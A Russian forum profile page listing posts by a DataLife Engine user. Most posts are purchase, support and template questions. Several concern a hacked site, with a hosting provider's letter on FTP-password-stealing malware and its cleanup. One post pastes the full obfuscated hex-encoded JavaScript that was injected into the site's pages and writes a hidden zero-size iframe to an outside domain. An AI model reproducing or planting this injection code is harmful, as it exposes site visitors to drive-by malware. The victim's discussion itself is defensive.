-
Публикации
608 -
Зарегистрирован
-
Посещение
Сообщения, опубликованные пользователем Langly
-
-
Langly,
файл index.php проверьте
Не могу попасть на сервер...
-
Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте?
Реклама-то есть. Но она есть давно, а эта хрень сегодня с утра появилась.
Началось с того, что касперыч заверещал, когда я сайт открывал:
обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: http://endem.ru/[1]
обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: http://endem.ru/[3]
После, ни одного визга от него не было и сейчас нет. Заткнулся и молчит.
А скрипт этот висит в самом верху страницы, при просмотре HTML его видно... Шаблон открываю - там нет.
Проверка сайта, его антивирусом из админки, ничего не дает...
-
- троян на твоем компе - украдены пароли от фтп - залито по фтп
- взломан комп хостера - украдены пароли от фтп- залито по фтп
- троян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоны
- дал кому то пароли от админки - добавлена запись в шаблоны
- не установил баг-фиксы - взломана админка - добавлена запись в шаблоны
А почему антивирус пишет "подозрительных объектов не обнаружено"?
Куды бечь? Что делать -то? Если я его найду в шаблонах и удалю, это решит проблему? Как быть уверенным в том, что ничего нигде не осталось?
И как искать? Может он разбросан кусками по разным местам...
P.S.Я его найти не могу... где, и самое главное, как искать?Подскажите пожалуйста.
- троян на твоем компе - украдены пароли от фтп - залито по фтп
-
Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего.
Откуда он мог появиться?
То есть возможные пути проникновения.
-
Заметил вверху страницы, при просмотре HTML кода, вот это... Подскажите пожалуйста, что это???
<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi <skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.fromCharCode(parseInt(skusjits.substr(uknzaxauyi,2),16)));}document.write(fgdxbotv);} ahpgxusvlwuzz"3C696672616D65207372633D22687474703A2F2F746F703130302D636F756E7465722E636F6D 2F746F703130302F696E6465782E70687022206672616D65626F726465723D22302220626F726465 723D2230222077696474683D22302 2206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207 669736962696C6974793A2068696464656E3B 20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
-
Пожелания хоть и не касаются работы скрипта, но все-же есть:
Хотелось бы в "Управлении рекламой" иметь возможность "складировать" длинные вертикальные информеры не друг за другом как сейчас(портянка получается... реально метрами мерять можно!), а столбиками рядом.
При добавлении новости, в админпанели иметь по умолчанию "галку" и подпись к ней "выводить в рсс". Если новость не нужна в рсс, то галка снимается.
При загрузке изображений было бы удобно иметь у окошка с кнопкой "Обзор" кнопку "Еще". При нажатии выводилось бы еще одно подобное окошечко и так до 5-10. Чтобы разом можно было загрузить несколько картинок, а не по одной.
В админпанели в добавлении новостей не помешала бы кнопка "добавить таблицу" как в экселе. Раскладушка с клеточками(выбор кол-ва строк и столбцов)
-
Сelsoft, доброго времени суток!
Я оплатил 40+10
Сейчас в личку сброшу Вам необходимые сведения.
С ув., Langly
-
Хорошо, спасибо.
Тогда я жду, как только - так сразу отправлю Вам необходимые сведения.
-
4. Как будет происходить техподдержка, если я второй день не могу до вас достучаться?
Вам было отправлено два письма, но они вернулись с пометкой о том что не могут быть доставлены.
Если вы не получаете ответа в течении дня, то всегда пишите или в ПМ или на форуме, вы не полуете ответа не потому что вам не отвечают, а потому что бывает что e-mail не доходит до адресата.
Я ждал ответа в личку. ОК, приму к сведению.
На gmail вроде все послания доходят... хотя, вроде первоначально я дал другой ящик... ладно бог с ним.
Скажите, celsoft, я сейчас зарегистрировал домен. Он еще не ожил. В такой ситуации установить и настроить сайт можно, или надо дождаться когда он(домен) заработает? Если"Да-можно", то я сейчас оплачу 40+10 и можно приступать?
Расскажите пож. порядок моих и Ваших действий для покупки, установки и запуска сайта.
-
Langly,
дело Ваше.
Будут вопросы, спрашивайте.
ОК.
Спасибо.
-
Я сейчас оплатил домен и хостинг, пока все это устаканится... пишут 6-12 часов. Так-что скорее завтра.
-
Да, спасибо... смотрю, что дела с шаблонами надо оставить "на потом".
Подскажите, пож. если я сейчас оплачу по схеме 40+10, когда можно приступить к установке и настройке?
И уже потом, по-возможности, поменять шаблон.
Это будет трудно сделать? учитывая наличие контента на сайте?
Вообще, я смогу поменять шаблон? Это трудно?
-
То есть надо новый шаблон искать...
Плохо. Хотел купить прям сейчас... но нужен трехколоночный.
Шаблон стоит 60 баксов... легче действительно найти готовый движок с тремя колонками, жаль...
А почему не сделать по-умолчанию трехколоночный? Именно на них спрос. Даже на www.dletemplates.com, их нет. Все нарасхват. Одни двухколоночные валяются...
Может подскажите где купить готовый?
Блин, хотел чтобы все в одном месте было... и дле, и техподдержка...
-
Как же мне его сделать трехколоночным?
-
Писал ч/з форму обратной связи вчера-сегодня, но так и не получил ответа...
Хочу купить скрипт + техподдержка(40+10евро). Но у меня есть несколько вопросов.
1. Мне нужен трехколоночный сайт. Это настраивается? Вы писали, что в техподдержку входит установка сайта на сервер и отладка. Сделать его тремя колонками во время этих процедур возможно?
2. Сроки установки и отладки сайта на сервере?
3. В комплекте идут две стандартные шкуры(как в версии демо)? Или голый скрипт к которому надо дополнительно искать шаблон? Вообще после уплаты 50евро я получу рабочий и готовый сайт?
4. Как будет происходить техподдержка, если я второй день не могу до вас достучаться?
Спасибо.
С уважением,Langly.
Скрипт появился...
в DataLife Engine (Общие вопросы)
Опубликовано:
Вот что хостер мне написал:
Здравствуйте!
В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.
Схема заражения довольно проста: достаточно зайти на зараженный сайт и
при стандартных настройках безопасности браузера, вирус автоматически
установится на компьютере пользователя. После этого он начинает
отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав
определенное количество паролей, запускается специальная программа,
которая подключается по FTP к каждому сайту и встраивает в начало или
конец страниц собственный html-код.
Обращаем внимание, что в интернете можно встретить обсуждение данной
проблемы, где в качестве причин заражения указываются различные
бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у
хостинг-провайдеров. Со своей стороны можем заверить, что вирус
распространяется только способом, описанным в этом письме, и его
появление не связано с проблемами безопасности на сервере.
В случае обнаружения следов вируса необходимо выполнить следующие
действия с обязательным соблюдением порядка:
1. Проверить нет ли чужих скриптов на ftp
2. Удалить все лишние коды iframe и javascript со страниц
3. Сменить ftp-клиент и браузер. Поставить новые версии, скаченные с
сайтов-производителей.
4. Поставить фаервол
5. Сменить все пароли
6. Не сохранять пароли в программах на комьютере. Вводить каждый раз.
Какой пароль для входа Вы используете?